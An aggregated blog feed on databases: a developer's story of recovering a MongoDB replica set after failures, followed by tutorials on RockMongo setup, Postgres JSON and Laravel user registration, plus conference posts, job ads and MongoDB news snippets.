          Some background about my online service. I released a new version of the desktop application PomodoroApp at the end of 2012, with support for data synchronization across computers. Users rely on my server to sync data. It is yet another new service on the Internet that no one knows about; I'm not sure whether tomorrow will bring 1 new user or 1,000 new users. Although I designed a reliable and scalable server architecture, I applied a minimum viable architecture for the servers in order to reduce cost, since perhaps nobody will use the service next week. There are 2 web servers: one hosts my website, and another hosts a node.js server for data synchronization. It provides only REST services, so I'll call it the sync server. There is 1 MongoDB database server instance. Each one can be a single point of failure, which is acceptable if I get 99.95% availability. My sync server is under a very low load, so I configured it to also be the secondary of a MongoDB replica set. The server code also supports reading data from the replica set.



          Everything ran very well for the next 2 months. I kept improving the server and adding new features. Users came to the service from Google, blogs, Facebook, and Twitter, and grew at a steady rate. When I have new code, it takes just 1 second to restart the service. On February 17th, 2013, for an unknown reason, the database server went out of service. Nobody knew the reason; Linode technical support managed to fix the issue. When the database server was down, the secondary database on the sync server became primary, and all data reads/writes switched to the database on my sync server automatically. This may take about 1 minute, depending on the timeout settings, so the outage of the database server had no impact on my sync service.

          However, I was just lucky with the incident on Feb 17. Just 3 days later, my sync server went down, and I could not even restart it from the Linode management console. This took 55 minutes. I got alerts from the monitoring service Pingdom, and also reports from customers. This was the first lesson: single points of failure do happen. I decided to add more sync servers; consequently, a load balancer became necessary for the 2 sync servers. In addition, I added a 3rd replica set member which has a 1-hour delay from the primary server, so that if any data gets corrupted, I can recover it from this backup. You may ask why a 1-hour delay instead of 24 hours; ideally there should be multiple delayed replica set members. In my production environment, the user count is still small, and there is no need for sharding so far. But my new features, and my changes to existing code, are only tested in the dev environment; when I deploy them to the server, they may damage it, and I need a backup plan for that case. Even though there are still SPOFs, it's much better :)
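
          In the mongo shell of that era, a delayed member is added roughly like this (the hostname is a placeholder; newer MongoDB versions use secondaryDelaySecs instead of slaveDelay):

          // Hidden member that applies the oplog with a 1-hour delay and never becomes primary.
          rs.add({
            _id: 3,
            host: "backup.example.com:27017",
            priority: 0,          // never eligible to become primary
            hidden: true,         // invisible to client reads
            slaveDelay: 3600      // stay one hour behind the primary
          })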

          The real disaster happened on May 11, when I was about to deploy a new version that resolved some database issues. The new version handled index creation on the database. I use a web-based admin tool to manage my MongoDB instances, and when I connected to the production database for final release testing, I happened to find a duplicated index on a collection. I wasn't sure why that had happened, so I deleted one index in the admin tool. The tool reported that both indexes were deleted. Later, when I continued my testing and tried to sync data to the server, I got an error that the commit to the database had failed. That had never happened before. Then I used the MongoDB console to check the collection. To my surprise, the whole collection was lost and could not be created again. I shut down the MongoDB server and tried to restart it. It failed! The database log showed "exception: BSONObj size: 0 (0x00000000) is invalid. Size must be between 0 and 16793600(16MB) First element: EOO". Googling the exception did not help much. Oh my, I finally had to recover the database. Fortunately I have one replica set member that is a real-time mirror of the database, and another member with a 1-hour delay. I spent about 2 hours fixing the issue, but my sync service stayed online and functioned well, because I had already "stepDown" the primary and the secondary was now working as primary. Doing this troubleshooting did not hurt my online service. MongoDB really did an excellent job with the replica set pattern.
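
          Stepping down a primary is a one-liner in the mongo shell; a secondary then takes over after an election (the timeout value is illustrative):

          // On the current primary: refuse to be primary for 120 seconds so a secondary is elected.
          rs.stepDown(120)
          rs.status()           // verify which member is now PRIMARY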

          Initially I decided to recover the database from the replica set member with the 1-hour delay. But it is in another data center; copying the data files with scp ran at only 1.7 MB/second, and I have 9 GB of data in total, which would take a long time. Then I checked the new primary database and fortunately found that the new primary (the old secondary) was in good shape: its data files were not broken. So I stopped that database and spent about 2 minutes copying all the files at a 29 MB/second transfer speed within the same data center. Again, it's still a very small business; 2 minutes of outage is acceptable, because my client software supports offline mode: it has a local database and can work without Internet access, and when the network is available it syncs to the server. Some users even disable the sync feature because they don't want to upload any data to the server. After all files were copied, I restarted MongoDB. It took several seconds to recover the uncommitted data from the oplog and start replicating from the primary server. Everything works well now. MongoDB rocks!

          Even though I have the ultimate backup plan designed and tested in my client software, the incident still made me very tense. My actual backup plan is: if the whole database is lost, I can still recover all the data, because my client software supports offline mode and keeps a copy of all of the user's data. Automatic data recovery from the user's machine to the server is already in place.

          This story is my first real disaster so far. I respect my VPS provider Linode, and I respect the software companies behind Linux, node.js, and MongoDB. But it really is a must to keep "design for failure" as the top priority, even when you are very small. The hardware may go down, the software may have bugs, the I/O or the memory may get corrupted, and hackers may want your server. People say the only thing that never changes is change; my lesson is that the only thing that never fails is failure. Without these lessons, "Design For Failure" would never have had such a tremendous impact on my future designs.

                     RockMongo: MongoDB Client on Mac OSX Lion        
          On Mac OS X Lion, I use MongoHub as the client tool to view and browse my MongoDB. MongoHub has a native Mac UI and provides the functionality for most of my operations. However, MongoHub is a little buggy and sometimes crashes. On my Apache server, I use RockMongo, an excellent MongoDB administration site, to manage my MongoDB. Here are the steps I used to launch RockMongo on Mac OS X Lion (10.7). It runs perfectly!


          1. Apache2 and PHP5 are already installed on Mac OS X. You just need to enable them.
            • Enable Apache2 (see: install apache2 on mac osx).
            • PHP is disabled in Apache2 by default, so you need to enable it manually: open the Apache2 config file with the command "sudo vi /etc/apache2/httpd.conf", find the line "LoadModule php5_module libexec/apache2/libphp5.so", and remove the "#" at the beginning to enable the php5 module.
          2. Install the mongo PHP driver
            • You may first need to install the PHP tool "pecl":
              • cd /usr/lib/php
              • sudo php install-pear-nozlib.phar
              • Edit /etc/php.ini, find the line ;include_path = ".:/php/includes", and change it to:
                include_path = ".:/usr/lib/php/pear"
              • sudo pear channel-update pear.php.net
              • sudo pecl channel-update pecl.php.net
              • sudo pear upgrade-all
            • Then run the command "sudo pecl install mongo". Make sure Xcode has been installed correctly; pecl will download the mongo PHP driver source code and build it. (A precompiled mongo.so may not work on your machine, so you have to use pecl to install the driver.)
            • Run the command "sudo vi /etc/php.ini" to open php.ini for editing (if /etc/php.ini does not exist, copy /etc/php.ini.default to /etc/php.ini), and add "extension=mongo.so".
          3. Download the RockMongo source code and copy it to your computer's website folder.
          4. Run "sudo apachectl restart" to restart the Apache2 server.
          5. Log in to http://localhost/rockmongo with user/password "admin/admin". You should then see RockMongo as follows:




                    Cloudera And MongoDB Join Forces For Big Data, Helped By Intel's Funding        
          Two companies driving the growth for Big Data analytics have joined forces to develop new services for enterprise customers. Cloudera and MongoDB recently announced a partnership to pool resources after years of informal collaboration. They are stepping up their Big Data efforts to accelerate the enterprise industry's shift to the [...]
                    Comment on Updating PostgreSQL JSON fields via SQLAlchemy by Mikko Ohtamaa        
          This is not an issue with PostgreSQL and JSON, but a general issue: the default Python dictionaries do not propagate changes to their parent objects. For example, ZODB solved this issue back in 2000 by using a PersistentDict class. For PostgreSQL a mutable dictionary recipe exists: http://variable-scope.com/posts/mutation-tracking-in-nested-json-structures-using-sqlalchemy
                    Database Operator - everis - Bilbao        
          At everis IM we are looking for a Database Operator. Requirements: Education: a university degree and/or higher vocational training in the field of IT and Communications. Required experience: at least 2 years in database administration. Required technical knowledge: Oracle RDBMS, Oracle RAC, Oracle RMAN, Oracle RAT, Oracle Streams, Oracle Golden Gate, Microsoft SQL Server, Oracle MySQL, Oracle Cloud Control, MongoDB. Be part of the team...
                    Oracle DBA (Ref. BC) - Keapps - Madrid        
          At Keapps we are recruiting an Oracle DBA for a project located in Madrid. If you are interested in continuing your professional career as an Oracle DBA, we have a stable project we invite you to consider. Requirements: Experience in installation and configuration, and in Oracle database administration. Proven experience in: Oracle, Oracle RAC, MongoDB. A proactive person with great teamwork skills, who brings enthusiasm and ideas, and is committed to...
                    The selected version of the DynamoDB Local is not installed        
          Hi. When I tried to use a local DynamoDB with the AWS Toolkit for VS 2015, it failed 100% of the time with the error "The selected version of the DynamoDB Local is not installed"
          ...
                    Getting Started        

          I've been involved with World Singles for about five years now, about three and a half years as a full-time engineer. The project was a green field rewrite of a dating system the company had evolved over about a decade that, back in 2009, was running on ColdFusion 8 on Windows, and using SQL Server. The new platform soft-launched in late 2011 as we migrated a few small sites across and our full launch - migrating millions of members in the process - was May 2012. At that point we switched from "build" mode to "operations" mode, and today we maintain a large codebase that is a combination of CFML and Clojure, running on Railo 4.2 on Linux, and using MySQL and MongoDB, running partly in our East Coast data center and partly on Amazon.

          Like all projects, it's had some ups and downs, but overall it's been great: I love my team, we love working with Clojure, and we have a steady stream of interesting problems to solve, working with a large user base, on a multi-tenant, multi-lingual platform that generates millions of records of data every day. It's a lot of fun. And we all get to work from home.

          Sometimes it's very enlightening to look back at the beginning of a project to see how things got set up and how we started down the path that led to where we are today. In this post, I'm going to talk about the first ten tickets we created as we kicked the project off. Eleven if you include ticket "zero".

          • #0 - Choose a bug tracking / ticketing system. We chose Unfuddle. It's clean and simple. It's easy to use. It provides Git (and SVN) hosting. It provides notebooks (wikis), ticketing, time management, customizable "agile" task boards, collaboration with external users, and it's pleasing to the eye. I've never regretted our choice of Unfuddle (even when they did a massive overhaul of the UI and it took us a week or so to get used to the radically new ticket editing workflow!).
          • #1 - Version control. Yes, really, this was our first ticket in Unfuddle. The resolution to this ticket says:
            Selected vcs system (git), created repository in Unfuddle, and provided detailed documentation on why git, how to set it up, how to connect to the repo and how to work with git.
            And the documentation was all there in an Unfuddle notebook for the whole team. A good first step.
          • #2 - Developer image. Once we had version control set up and documented, we needed an easy way for every developer to have a full, self-contained local development environment. We had some developers on Windows, some on OS X, some on Linux, so we created a VMWare image with all the basic development tools, a database, a standardized ColdFusion installation, with Apache properly configured, etc. This established a basic working practice for everyone on the team: develop and test everything locally, commit to Git, push to Unfuddle. We could then pull the latest code down to a showcase / QA server for the business team to review, whenever we or they wanted.
          • #3 - Project management system. Although we had bug tracking and wikis, we wanted to nail down how communication would work in practice. We created a project management mailing list for discussion threads. We created a notebook section in Unfuddle for documenting decisions and requirements. We decided to use Basecamp for more free-form evolution of business ideas. We agreed to use tickets in Unfuddle for all actionable work, and we settled on a Scrum-like process for day-to-day development, with short, regular sprints so we could get fast feedback from the business team, and they could easily see what progress we were making.
          • #4 - General project management. Since we had agreed to use Unfuddle for time tracking, we created a ticket against which to track project management hours that didn't fit into any actual work tickets. We used this for the first six months of the project (and logged about 300 hours against it).
          • #5 - Performance planning/tuning. This was mostly a placeholder (and initially focused on how to make a Reactor-based application perform better!). It was superseded by several more specific tickets, six months into the project. But it's one of those things we wanted on the radar early for tracking purposes.
          • #6 - Architectural planning. Like ticket #4, this was a time tracking bucket that we used for the first six months of the project.
          • #7 - Set up Continuous Integration. Yup, even before we got to our first actual coding ticket, as part of the early project setup, we wanted a Continuous Integration server. Whilst we were using ColdFusion for local development (prerelease builds of ACF9, at the time), we chose to use Railo 3.2 for the CI server so that we could ensure our code was cross-platform - we were still evaluating which engine to ultimately go to production with. The resolution of this ticket says:
            Apache / Tomcat / Railo / MySQL / Transparensee / Hudson in place. Automated test run restarts Railo, reloads the DB, reloads Transparensee, cleans the Reactor project, runs all test suites and generates test results.
            We developed an Ant script that stopped and started Railo, tore down and rebuilt the test database, using a canned dataset we created (with 1,000 random users), repopulated the search engine we use and cleaned up generated files, then ran our fledgling MXUnit test suite (and later our fledgling Selenium test suite).
          • #8 - Display About us/trust. This was our first actual code ticket. The company had selected ColdBox, ColdSpring, and Reactor as our basic frameworks (yeah, no ticket for that, it was a choice that essentially predated the project "getting started"). This ticket was to produce a first working skeleton of the application that could actually display dynamically generated pages of content from the database. We created the skeleton of the site navigation and handlers for each section as part of this ticket. The "trust" in the ticket title was about showing that we really could produce basic multilingual content dynamically and show an application architecture that worked for the business.
          • #9 - Implement resource bundles for templates. And this was also an early key requirement: so that we could support Internationalization from day one and perform Localization of each site's content easily.
          • #10 - Display appropriate template for each site. This was our other key requirement: the ability to easily skin each site differently. Like #9, this was an important proof of concept to show we could support multiple sites, in multiple languages, on a single codebase, with easy customization of page layouts, content, and even forms / questions we asked.

          So that's how we got started. Bug tracking, version control, local development environment, continuous integration and the key concepts tackled first!

          A reasonable question is to ask what has changed in our approach over the five years since. We're still using Unfuddle (in case you're wondering, we're up to ticket 6537 as I write this!), we're still using Git (and still loving it). Our development stack has changed, as has some of our technology.

          Over time we all migrated to Macs for development so maintaining the VM image stopped being important: everyone could have the entire development stack locally. We eventually settled on Railo instead of ColdFusion (we're on Railo 4.2 now), and we added MongoDB alongside MySQL a couple of years ago. We added some Scala code in 2010 to tackle a problematic long-running process (that did a lot of XML transformation and publishing). We added Clojure code in 2011 for a few key processes and then replaced Scala with Clojure, and today Clojure is our primary language for all new development, often running inside Railo. We stopped using Reactor (we wrote a data mapper in Clojure that is very close to the "metal" of JDBC). Recently we stopped using MXUnit and replaced it with TestBox. We're slowly changing over from Selenium RC tests to WebDriver (powered by Clojure). We have about 20,000 lines of Clojure now and our CFML code base is holding steady at around 39,000 lines of Model and Controller CFCs and 45,000 lines of View cfm files.


                    Conferences & Me        

          cf.Objective() is over for another year and the reactions I've seen were all very positive. As a long-time member of the Steering Committee, that makes me very happy. This is the first time I've ever missed cf.Objective(). Yes, I've attended eight of the nine, and I've been a speaker at six of them (I think?). I've also attended as a sponsor (2012, as Railo's "booth babe").

          This year also saw Into The Box the day before - a one day conference dedicated to all things *Box, not just ColdBox. That conference also seemed to go well, from what I saw on Twitter, and I'm very interested to learn more about CommandBox, the CLI and package manager they previewed!

          Eagle-eyed readers may have noticed posts from me back in November and December indicating that I'd submitted talks to cf.Objective() and Scotch on the Rocks, which had been accepted... and then those posts disappeared. I took the posts down to reduce linkage to them and, to some extent, to head off any questions. I try really hard not to back out of commitments: I had to cancel Scotch on the Rocks back in 2009 because my wife broke her ankle just before the conference and she was laid up in bed for a couple of months and then in a wheelchair for another couple of months.

          Over the last few years, I've attended a lot of conferences and most of them have been out of my own pocket and out of my vacation allowance. Over the last few years, my technology focus has shifted. When I joined World Singles full-time in 2010, I came in primarily as a CFML developer, with experience in a number of other languages. At BroadChoice we'd gone to production with Groovy and Flex alongside CFML. At World Singles, we went to production with Scala alongside CFML and then we introduced Clojure. Now we're primarily a Clojure shop: it's our go-to language for all new work and we're slowly replacing CFML code with Clojure code as we touch that CFML code to make enhancements. The benefits of immutable data, pure functions, and composable data transformations - and the ease with which we can operate concurrently - are huge.

          That shift has meant that CFML conferences, once core to my work, are now a personal luxury. The once bleeding edge, new technology events that I could justify as an investment in my personal growth have instead become core to my work: MongoDB Days, Clojure/West, The Strange Loop, Lambda Jam, Clojure/conj. Even with an employer as generous as World Singles, I can't get to all of those on the company dime and company time.

          I've been very lucky to be able to attend and speak at so many conferences over the last decade, and I've loved attending all those CFML conferences: MXDU, Fusebox, Frameworks, CFUnited, CFinNC, cf.Objective(), Scotch on the Rocks. I have a huge number of friends in the CFML community and that's a big part of what I love about the conferences. The desire to see my friends is a large part of why I've continued to submit talks to CFML conferences.

          Unfortunately, as Jay & I reviewed our commitments back in January, both financial and timewise, as we started to prepare our 2013 tax return, it became clear that there was no way I was going to be able to attend Into The Box, cf.Objective(), and Scotch on the Rocks. It led to some very uncomfortable discussions with those conference organizers. I'd already overreached in 2013 and, realistically, I shouldn't have even submitted talks.

          In the end, of course, Into The Box and cf.Objective() were both great successes - they are so much more than the sum of their speakers - and Scotch on the Rocks looks absolutely amazing. I wish I could attend! I miss my friends in the CFML community and without the conferences I don't get to hang out with them.

          I'm sorry that I caused the conference organizers hassle by submitting talks and then pulling out. As a long-time member of the cf.Objective() Steering Committee I know that flaky speakers are a pain in the ass!

          Realistically, all this means that unless you attend The Strange Loop (or a Clojure conference), I'm probably not going to get to hang out with you in the future. That makes me sad for the friends I won't get to see but I hope we all grow...


                    Tutorial: Client for a REST web service with REST Hooks using JAX-RS (Jersey) and Maven        
          The title of this post sounds a bit cryptic, so let's first break it down calmly. A web service can be summarized as the set of technologies that allow applications to exchange information over the web. REST (Representational State Transfer) is a software architectural style aimed at creating scalable web services. Broadly speaking, it establishes […]

                    MongoDB and Java: Part V, more queries, users, roles, and authentication        
          To finish, we will look at some other actions and queries we can perform on the database, how to enable and configure authentication, and the use of users and roles. With authentication we will ensure that only the users we define, using a password and through the assignment of roles, can access […]

                    MongoDB and Java: Part IV, basic queries against the database        
          Once the environment is configured and we have checked that we can connect to and access the database, let's see how to run basic queries from Java against MongoDB. In Part III we saw how to connect, select a collection, and count the number of documents in it. Getting all the elements of the collection: The […]

                    MongoDB and Java: Part III, creating a project in NetBeans with Maven        
          Let's see how to create a project in NetBeans with Maven, from which we will connect to the MongoDB database we created in the previous parts of this tutorial. Maven is a project management tool; in our case we will use it mainly for dependency management. This way we delegate […]

                    MongoDB and Java: Part II, installing MongoDB and NetBeans on Windows 8        
          We have already seen how to install the MongoDB and NetBeans environment on Debian 7; now we will see how to do it on Windows 8, before creating our first Java project and starting with the examples. Let's begin with the MongoDB installation. We only need to download the .msi installer available on the MongoDB downloads page. In our case we chose […]

                    MongoDB and Java: Part I, installing MongoDB and NetBeans on Debian 7        
          MongoDB is an open-source NoSQL database system. The term NoSQL (Not only SQL) refers to database management systems that do not implement a relational model. Specifically, instead of tables MongoDB uses collections, which are sets of documents [tuples in the relational model] in […]

                    JSON in postgres 9.3        

          postgres 9.3 has native support for json. You can access and index values inside the json.

          
          psql (9.3.0)
          Type "help" for help.
          
          # The JSON type!
          yoyodb=> CREATE TABLE publishers(id INT, info JSON);
          CREATE TABLE
          
          # Indexing a JSON field!!
          yoyodb=> CREATE INDEX ON publishers( ( info->>'name' ) ) ;
          CREATE INDEX
          
          yoyodb=> insert into publishers (id,info) values (1, '{"name":"foo"}');
          INSERT 0 1
          yoyodb=> insert into publishers (id,info) values (2, '{"name":"bar"}');
          INSERT 0 1
          yoyodb=> insert into publishers (id,info) values (3, '{"name":"baz"}');
          INSERT 0 1
          yoyodb=> select * from publishers
          yoyodb-> ;
           id |      info      
          ----+----------------
            1 | {"name":"foo"}
            2 | {"name":"bar"}
            3 | {"name":"baz"}
          (3 rows)
          
          # Access a field inside the JSON with col->'key'
          yoyodb=> select info->'name' from publishers ;
           ?column? 
          ----------
           "foo"
           "bar"
           "baz"
          (3 rows)
          
          yoyodb=> select info from publishers where info->>'name'='bar';
                info      
          ----------------
           {"name":"bar"}
          (1 row)
          
          yoyodb=> select info->'name' from publishers where info->>'name'='bar';
           ?column? 
          ----------
           "bar"
          (1 row)
          

          Installation on debian

          http://www.postgresql.org/download/linux/ubuntu/

          
          echo 'deb http://apt.postgresql.org/pub/repos/apt/ precise-pgdg main' | sudo tee /etc/apt/sources.list.d/postgres.list
          
          wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc | sudo apt-key add -
          
          sudo apt-get update
          
          sudo apt-get install postgresql-9.3
          
          

          Setting up the DB and user

          With commands, like this:

          createuser --no-adduser --no-createdb --pwprompt --encrypted yoyota
          createdb --owner=yoyota --encoding=UNICODE yoyodb
          

          Or alternatively:

          su postgres
          psql
          CREATE ROLE yoyota WITH LOGIN NOSUPERUSER NOCREATEROLE ENCRYPTED PASSWORD 'xxxx';
          CREATE DATABASE yoyodb WITH OWNER yoyota;
          

          Client permissions

          Add a line like this to /etc/postgresql/9.3/main/pg_hba.conf:

          local all all md5


          This is truly groundbreaking. It neatly blends schema-less JSON with SQL. It may be the feature that turns Postgres from an excellent RDB into an all-purpose database that covers everything up to no-sql. For future development, psql it is.


                    monga/monga (0.2.4)        
          MongoDB Abstraction Layer
                    doctrine/mongodb (1.6.0)        
          Doctrine MongoDB Abstraction Layer
                    doctrine/mongodb-odm (1.1.5)        
          Doctrine MongoDB Object Document Mapper
                    doctrine/doctrine-mongo-odm-module (1.0.0)        
          Zend Framework Module that provides Doctrine MongoDB ODM functionality
                    doctrine/mongodb-odm-bundle (3.3.0)        
          Symfony2 Doctrine MongoDB Bundle
                    Mongoose models and unit tests: The definitive guide        
          Mongoose is a great tool, as it helps you build Node apps which use MongoDB more easily. Instead of having to sprinkle the model-related logic all over the place, it’s easy to define the functionality as Mongoose models. Querying MongoDB for data also becomes quick and easy – and if you ever need some custom querying logic, that can be ...
                    Using mongodb text search with node.js        
          In my last post I talked about enabling mongodb’s beta text search, which at least to me was a little less than intuitive to accomplish. That’s probably partly because of the beta nature of this feature. The next challenge was figuring out how to interact with the text search functionality from node.js, since interacting with […]
                    MongoDb text search        
          Full text search in noSQL databases is far less common than one would think. Most apps I build can benefit from full text searches, even if they don’t need sophisticated search capabilities. There are external solutions for most databases, mostly tying in Lucene through Elastic Search or Solr. Sometimes those external solutions are just the […]
                    links for 2011-09-01        
          The evolution of Spring dependency injection techniques (tags: java spring) Understanding Spring Web Service and JAXB integration (tags: java) Spring Data & MongoDB | Javalobby (tags: java) Do it short but do it right ! (tags: java)
                    An Interview with Meagen Eisenberg        
          Meagen Eisenberg, MongoDB

          I was able to sit down with Meagen Eisenberg, CMO at MongoDB to talk about new ideas in SaaS Marketing, her career path, and how being a mom has made her better at her job as a CMO. You have worked in leadership positions at ArcSight (acquired by HP), DocuSign and are now CMO at […]

          The post An Interview with Meagen Eisenberg appeared first on Usersnap Blog.


                    MongoDB Europe 2017 has its date        

          Besides MongoDB World, the two-day event held in the United States, there is also a European version called MongoDB Europe. It will take place on 8 November in London, specifically at the InterContinental London - The O2. So even the venue suggests it will be a big event.

          MongoDB Europe 2017 is an educational event that goes


                    SECURE LOGIN SYSTEM – PHP(LARAVEL) – 2        

          This is the second part of the Secure Login System – PHP (Laravel) series. If you missed part 1, click here. Let's complete our registration module in this part. In part 1 we created the Profile model; now we will create its table structure. Below are the SQL and the migration to create the profile table.

           

           

           

          php artisan migrate:make SystemTableProfileCreate

          2014_04_03_085059_SystemTableProfileCreate.php

          /**
           * Run the migrations.
           *
           * @return void
           */
          public function up()
          {
              Schema::create('profile', function($table)
              {
                  $table->engine = 'InnoDB';
                  $table->increments('id');
                  $table->bigInteger('user_id')->unique();
                  $table->string('username', 255);
                  $table->string('email', 255);
                  $table->timestamps();
              });
          }
           
          /**
           * Reverse the migrations.
           *
           * @return void
           */
          public function down()
          {
              Schema::drop('profile');
          }

          sql

          CREATE TABLE IF NOT EXISTS `profile` (
          `id` int(11) NOT NULL AUTO_INCREMENT,
          `user_id` int(11) NOT NULL,
          `username` varchar(255) NOT NULL,
          `email` varchar(255) NOT NULL,
          `updated_at` datetime NOT NULL,
          `created_at` datetime NOT NULL,
          PRIMARY KEY (`id`)
          ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

          We have already created the register view in part 1; now we will handle the registration flow. When the user clicks register, the form is posted to storeRegister() of LoginController. In storeRegister we take the username, email, password, and password_confirmation and validate them. If the validator passes, we register the user. The user registration code block has two lines commented out: if you do not want to auto-activate the user, uncomment the second register method and comment out the first one, and also uncomment the code which sends a mail to the user with the activation code. By default our code registers a user and adds the user to the users group. If the groups have not been created yet, it creates two groups: the first is users and the second is admin.

          public function storeRegister() {
                  // Gather Sanitized Input
                  $input = array('username' => Input::get('username'), 'email' => Input::get('email'), 'password' => Input::get('password'), 'password_confirmation' => Input::get('password_confirmation'));
           
                  // Set Validation Rules
                  $rules = array('username' => 'required|min:4|max:20|unique:profile,username', 'email' => 'required|min:4|max:32|email', 'password' => 'required|min:6|confirmed', 'password_confirmation' => 'required');
           
                  //Run input validation
                  $v = Validator::make($input, $rules);
           
                  if ($v -> fails()) {
                      return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                  } else {
           
                      try {
                          //Pre activate user
                          $user = Sentry::register(array('email' => $input['email'], 'password' => $input['password']), true);
                          //$user = Sentry::register(array('email' => $input['email'], 'password' => $input['password']));
           
                          //Get the activation code & prep data for email
                          $data['activationCode'] = $user -> GetActivationCode();
                          $data['email'] = $input['email'];
                          $data['userId'] = $user -> getId();
           
                          //send email with link to activate.
                          /*Mail::send('emails.register_confirm', $data, function($m) use ($data) {
                           $m -> to($data['email']) -> subject('Thanks for Registration - Support Team');
                           });*/
           
                          //If no groups created then create new groups
                          try {
                              $user_group = Sentry::findGroupById(1);
                          } catch (Cartalyst\Sentry\Groups\GroupNotFoundException $e) {
                              $this -> createGroup('users');
                              $this -> createGroup('admin');
                              $user_group = Sentry::findGroupById(1);
                          }
           
                          $user -> addGroup($user_group);
           
                          $user = new Profile();
           
                          $user -> user_id = $data['userId'];
                          $user -> email = $data['email'];
                          $user -> username = $input['username'];
                          $user -> save();
           
                          //success!
                          Session::flash('success_msg', 'Thanks for sign up . Please activate your account by clicking activation link in your email');
                          return Redirect::to('/register');
           
                      } catch (Cartalyst\Sentry\Users\LoginRequiredException $e) {
                          Session::flash('error_msg', 'Username/Email Required.');
                          return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                      } catch (Cartalyst\Sentry\Users\UserExistsException $e) {
                          Session::flash('error_msg', 'User Already Exist.');
                          return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                      }
           
                  }
              }

          We have added one more function to our LoginController, which handles the creation of groups in Sentry:

          public function createGroup($groupName) {
                  $input = array('newGroup' => $groupName);
           
                  // Set Validation Rules
                  $rules = array('newGroup' => 'required|min:4');
           
                  //Run input validation
                  $v = Validator::make($input, $rules);
           
                  if ($v -> fails()) {
                      return false;
                  } else {
                      try {
                          $group = Sentry::getGroupProvider() -> create(array('name' => $input['newGroup'], 'permissions' => array('admin' => Input::get('adminPermissions', 0), 'users' => Input::get('userPermissions', 0), ), ));
           
                          if ($group) {
                              return true;
                          } else {
                              return false;
                          }
           
                      } catch (Cartalyst\Sentry\Groups\NameRequiredException $e) {
                          return false;
                      } catch (Cartalyst\Sentry\Groups\GroupExistsException $e) {
                          return false;
                      }
                  }
              }

          Email Template is saved in views/emails/register_confirm.blade.php

          <meta charset="utf-8" />
           
          <h2>Welcome</h2>
          <pre>
          <b>Account:</b> {{{ $email }}}
           
          To activate your account, <a href="{{ URL::to('register') }}/{{ $userId }}/activate/{{ urlencode($activationCode) }}">click
                  here.</a>
           
          Or point your browser to this address:
           {{ URL::to('register') }}/{{ $userId }}/activate/{{
              urlencode($activationCode) }}
           
          Thank you,
           
              ~The Support Team

          If you are using email activation, then you need to edit mail.php inside app/config and set the following fields to make it work:

          'host' => 'your host here',
          'username' => 'username/email',
          'password' => 'password',

          When the user activates the account through the email, they are redirected to the activation route, which executes the registerActivate method, activates the user, and then redirects to the login page with a success message.

          LoginController@registerActivate

          public function registerActivate($userId, $activationCode) {
                  try {
                      // Find the user using the user id
                      $user = Sentry::findUserById($userId);
           
                      // Attempt to activate the user
                      if ($user -> attemptActivation($activationCode)) {
                          Session::flash('success_msg', 'User activation successful. Please log in below.');
                          return Redirect::to('/login');
                      } else {
                          Session::flash('error_msg', 'Unable to activate user. Try again later or contact the Support Team.');
                          return Redirect::to('/register');
                      }
                  } catch (Cartalyst\Sentry\Users\UserNotFoundException $e) {
                      Session::flash('error_msg', 'User was not found.');
                      return Redirect::to('/register');
                  } catch (Cartalyst\Sentry\Users\UserAlreadyActivatedException $e) {
                      Session::flash('error_msg', 'User is already activated.');
                      return Redirect::to('/register');
                  }
              }

          If we enter a valid email, username, password and password_confirmation, we will get a success screen as below.

          If you try to register an already registered user, an error will be shown as below.


          Thanks

          KodeInfo


                    Infinite Serials - ODB Talk v2.5 serial download        
                    Slides "NoSQL Postgres"        
          Slides (full version) of the talk "NoSQL Postgres" that I presented at the Stachka conference are available: http://www.sai.msu.su/~megera/postgres/talks/jsonb-stachka-2017-full.pdf



          The slides cover the following topics:
          1. SQL/JSON
          2. Jsonb compression
          3. Full text search for json[b] data
          4. YCSB benchmark (one node) for PostgreSQL, MongoDB and MySQL
                    MongoDB – Node.js Tutorial for Beginners        
          In this tutorial, we’ll be talking about MongoDB and how we can use it to store our data. MongoDB will provide us with a simple CRUD (Create, Retrieve, Update, Delete) API. Node.js and MongoDB are two completely different things: MongoDB is a database, so it isn’t installed with Node.js. Node.js also doesn’t support MongoDB …
                    Colin Charles: CFP for Percona Live Europe Dublin 2017 closes July 17 2017!        

          I’ve always enjoyed the Percona Live Europe events, because I consider them to be a lot more intimate than the event in Santa Clara. It started in London, had a smashing success last year in Amsterdam (conference sold out), and by design the travelling conference is now in Dublin from September 25-27 2017.

          So what are you waiting for when it comes to submitting to Percona Live Europe Dublin 2017? The call for presentations closes on July 17 2017, and the conference has a pretty diverse topic structure (MySQL [and its diverse ecosystem including MariaDB Server naturally], MongoDB and other open source databases including PostgreSQL, time series stores, and more).

          And I think we also have a pretty diverse conference committee in terms of expertise. You can also register now. Early bird registration ends August 8 2017.

          I look forward to seeing you in Dublin, so we can share a pint of Guinness. Sláinte.


                    VS550 VgateScan OBD/EOBD Scan Tool        
          Automotive OBD II OBD2 OBDII ODB Diagnostic Code Reader Scanner Scan tool VS550
                    Commenti su I pronostici degli utenti (lunedì 4 aprile) di il re delle scommesse        
          Am I wrong, or does Podb still have 2 matches to play, and is therefore mathematically still in the running for the play-off group, like the home team?
                    Commenti su I pronostici degli utenti (lunedì 4 aprile) di johnny1987        
          Can anyone with expertise in the so-called minor leagues tell me something about the late fixture in the Polish league? It looks like a sure home win (a 1 sign), since Podb should by now have been relegated to the play-out group. Thanks
                    Beta: WebSphere Liberty and tools (December 2016)        

          The December Liberty beta includes the transportSecurity-1.0 feature and a MongoDB Integration 2.0 feature update.

          The post Beta: WebSphere Liberty and tools (December 2016) appeared first on WASdev.


                    How to Get Started With restdb.io and Create a Simple CMS        

          How to Get Started With restdb.io and Create a Simple CMS

          This article was sponsored by restdb.io. Thank you for supporting the partners who make SitePoint possible.

          Databases strike fear into the heart of the most experienced developers. Installation, updates, disk space provision, back-ups, efficient indexing, optimized queries, and scaling are problems most could do without. Larger organizations will employ a knowledgeable dev ops person who dedicates their life to the database discords. Yet the system inevitably fails the moment they go on vacation.

          A more practical option is to outsource your database and that's exactly the service restdb.io provides. They manage the tricky data storage shenanigans, leaving you to concentrate on more urgent development tasks.

          restdb.io: the Basics

